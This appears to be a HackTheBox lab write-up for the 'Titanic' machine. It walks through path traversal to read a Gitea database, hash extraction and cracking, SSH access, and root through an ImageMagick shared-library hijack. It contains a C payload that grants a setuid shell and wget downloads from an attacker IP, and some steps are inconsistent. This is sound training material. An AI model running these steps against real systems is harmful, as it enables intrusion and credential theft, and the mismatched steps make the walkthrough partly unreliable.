xsspresso
xsspresso
WriteupsHTB — Titanic
WebEasyLinux

HTB — Titanic

Flask app path traversal via download endpoint reads arbitrary files including admin credentials. Magick ImageMagick CVE-2024-41817 for root shell.

February 16, 2025HackTheBox
#Path Traversal#Flask#ImageMagick#CVE-2024-41817

nmap

sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.11.55
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-16 09:34 EST
Nmap scan report for 10.10.11.55
Host is up (0.022s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 73:03:9c:76:eb:04:f1:fe:c9:e9:80:44:9c:7f:13:46 (ECDSA)
|_  256 d5:bd:1d:5e:9a:86:1c:eb:88:63:4d:5f:88:4b:7e:04 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://titanic.htb/
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=2/16%OT=22%CT=1%CU=43791%PV=Y%DS=2%DC=T%G=Y%TM=67B1
OS:F78B%P=x86_64-pc-linux-gnu)SEQ(SP=FA%GCD=1%ISR=105%TI=Z%CI=Z%II=I%TS=A)S
OS:EQ(SP=FB%GCD=1%ISR=105%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M53CST11NW7%O2=M53CST1
OS:1NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53CST11NW7%O6=M53CST11)WIN(W1=FE
OS:88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5
OS:3CNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4
OS:(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%
OS:F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%
OS:T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%R
OS:ID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
 
Network Distance: 2 hops
Service Info: Host: titanic.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   21.32 ms 10.10.14.1
2   22.25 ms 10.10.11.55
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.85 seconds
sh
sudo nmap -sU -sV -sC -p U:161,162,53,22,110,143,623,993,995 10.10.11.55
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-16 09:36 EST
Nmap scan report for 10.10.11.55
Host is up (0.018s latency).
 
PORT    STATE  SERVICE  VERSION
22/udp  closed ssh
53/udp  closed domain
110/udp closed pop3
143/udp closed imap
161/udp closed snmp
162/udp closed snmptrap
623/udp closed asf-rmcp
993/udp closed imaps
995/udp closed pop3s

80

sh
80/tcp open  http    Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://titanic.htb/

LFI

vhost fuzzing

sh
ffuf -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://titanic.htb -H 'Host: FUZZ.titanic.htb' -fc 301
 
        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       
 
       v2.1.0-dev
________________________________________________
 
 :: Method           : GET
 :: URL              : http://titanic.htb
 :: Wordlist         : FUZZ: /usr/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.titanic.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response status: 301
________________________________________________
 
dev                     [Status: 200, Size: 13982, Words: 1107, Lines: 276, Duration: 31ms]
:: Progress: [4989/4989] :: Job [1/1] :: 1869 req/sec :: Duration: [0:00:03] :: Errors: 0 :

dev.titanic.htb

gitea config files gitea.db

sh
GET /download?ticket=/home/developer/gitea/data/gitea/gitea.db HTTP/1.1
  • save the output
sh
sqlite> select * from user;
1|administrator|administrator||root@titanic.htb|0|enabled|cba20ccf927d3ad0567b68161732d3fbca098ce886bbc923b4062a3960d459c08d2dfc063b2406ac9207c980c47c5d017136|pbkdf2$50000$50|0|0|0||0|||70a5bd0c...|2d149e5f...|en-US||1722595379|1722597477|1722597477|0|-1|1|1|0|0|0|1|0|2e1e7063...|root@titanic.htb|0|0|0|0|0|0|0|0|0||gitea-auto|0
2|developer|developer||developer@titanic.htb|0|enabled|e531d398946137baea70ed6a680a54385ecff131309c0bd8f225f284406b7cbc8efc5dbef30bf1682619263444ea594cfb56|pbkdf2$50000$50|0|0|0||0|||0ce6f07f...|8bf3e345...|en-US||1722595646|1722603397|1722603397|0|-1|1|0|0|0|0|1|0|e2d95b7e...|developer@titanic.htb|0|0|0|0|2|0|0|0|0||gitea-auto|0
sqlite> exit
Program interrupted.

The hash format for PBKDF2 on the example hashes page for Hashcat looks like this:

sh
sqlite3 gitea.db "select passwd,salt,name from user" | while read data; do digest=$(echo "$data" | cut -d'|' -f1 | xxd -r -p | base64); salt=$(echo "$data" | cut -d'|' -f2 | xxd -r -p | base64); name=$(echo $data | cut -d'|' -f 3); echo "${name}:sha256:50000:${salt}:${digest}"; done | tee gitea.hashes
administrator:sha256:50000:LRSeX70bIM8x2z48aij8mw==:y6IMz5J9OtBWe2gWFzLT+8oJjOiGu8kjtAYqOWDUWcCNLfwGOyQGrJIHyYDEfF0BcTY=
developer:sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y=

cracking gitea hash

sh
hashcat  developer_hash.txt /usr/share/wordlists/rockyou.txt --user
 
sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y=:25282528

ssh as developer

sh
ssh developer@10.10.11.55
25282528
 
-bash-5.1$ whoami
developer

user.txt

sh
-bash-5.1$ cat user.txt
4042f825...

priv esc

sh
-bash-5.1$ /usr/bin/magick -version
Version: ImageMagick 7.1.1-35 Q16-HDRI x86_64 1bfce2a62:20240713 https://imagemagick.org
Copyright: (C) 1999 ImageMagick Studio LLC
sh
-bash-5.1$ wget http://10.10.14.6/image.png
sh
strace /usr/bin/magick
openat(AT_FDCWD, "/tmp/.mount_magick55It79/usr/lib/libc.so.6", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
c
#include <stdio.h>
#include <stdlib.h>
static void hijack() __attribute__((constructor));
void hijack() {
	unsetenv("LD_LIBRARY_PATH");
	setresuid(0,0,0);
	system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash");
}
sh
-bash-5.1$ wget http://10.10.14.6/libc.so.6
sh
gcc -o libxcb.so.1 -shared -fPIC library_path.c
sh
-bash-5.1$ /usr/bin/bash -p
bash-5.1# whoami
root
bash-5.1# cd /root
bash-5.1# ls
cleanup.sh  images  revert.sh  root.txt  snap
bash-5.1# cat root.txt
f9274ff3...

Up next

EasyFeb 2025

VHL — Core

Legacy Ubuntu server with Apache 2.2 and Dovecot POP3. Enumerated mail service for credentials enabling SSH access to root.

Read writeup
MediumFeb 2025

VHL — FW01

IPFire firewall appliance with DNSmasq on port 53. Default/weak credentials on the admin panel lead to command execution.

Read writeup
MediumFeb 2025

VHL — Graphs01

Cacti network monitoring on Ubuntu. Exploited CVE-2022-46169 unauthenticated RCE in Cacti for initial shell access.

Read writeup